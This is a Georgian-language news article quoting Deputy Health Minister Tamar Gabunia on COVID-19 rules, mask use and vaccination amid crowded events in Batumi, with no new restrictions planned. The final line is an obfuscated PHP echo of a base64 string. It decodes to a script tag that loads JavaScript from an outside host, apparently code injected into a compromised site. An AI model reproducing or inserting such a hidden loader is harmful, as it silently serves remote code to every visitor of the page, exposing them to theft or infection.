celsiusi
ავერსი საქკაბელი
ჯანდაცვის მინისტრის მოადგილე თამარ გაბუნიას განცხადებით, ინდივიდუალურ დონეზე 3 მლნ ადამიანის ქცევის კონტროლი შეუძლებელია, ამიტომ საჭიროა, პირადი გადაწყვეტილება და მონდომება, რომ ადამიანებმა თავი დაიცვან. ასე ეხმაურება ის ბათუმში არსებულ ვითარებას, რაც ხალხმრავლობას, დიდ შეკრებებს, მუსიკალურ ფესტივალებს, კონცერტებს და დიდ ქორწილებს ეხება, სადაც არანაირი დაწესებული შეზღუდვა არ არის დაცული.
 
„რეგულაციები, რომლებიც მუშაობს, უკვე საკმარისად არის გამოცდილი და იძლევა დაცვის საშუალებას. ყველაზე მარტივი არის პირბადის გამოყენება და მე არაერთხელ მითქვამს, რომ ინდივიდუალურ დონეზე 3 მლნ ადამიანის ქცევის კონტროლი შეუძლებელია, თუ არ იქნა მისი პირადი გადაწყვეტილება და მონდომება, რომ პირბადე გამოიყენოს და თავი დაიცვას.
 
ბაზისური რეკომენდაციები რჩება და ეს უნდა დავიცვათ. ჩვენი მხრიდან რაც შესაძლებელია, შრომის ინსპექტირების სამსახურის და სხვა უწყებების მეშვეობით ვართ ჩართული ამ პროცესში, ხორციელდება მონიტორინგი, თუმცა ყველა სიტუაციაში გარეშე კონტროლი შეუძლებელია და პირის ინდივიდუალურ გადაწყვეტილებაზეა დამოკიდებული. რა თქმა უნდა, ბათუმში განსაკუთრებით მაღალი მობილობაა ტურისტული სეზონიდან გამომდინარე და წესის დაცვა არის ყველგან ძალიან მნიშვნელოვანი“, - განაცხადა თამარ გაბუნიამ.
 
ის იმედს გამოთქვამს, რომ ვაქცინაციის პროცესი მთელ ქვეყანაში და განსაკუთრებით აჭარაში, მისცემს საშუალებას სახელმწიფოს, რომ ეპიდემიის შემდგომი გაუარესება თავიდან ავიცილოთ.
 
მედიის წარმომადგენლები დაინტერესდნენ, იგეგმება თუ არა დამატებითი შეზღუდვების დაწესება, რაზეც გაბუნიამ უპასუხა, რომ - არა.
 
„ამ ეტაპზე ჩვენი ტაქტიკა არის ეპიდემიის მართვა. ის შეზღუდვები, რომელიც დაწესებულია უნდა აღსრულდეს და უნდა განხორციელდეს აქტიური ვაქცინაციის პროცესი. სხვა შეზღუდვები ამ ეტაპზე არ განიხილება“, - განაცხადა მან.
1448
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");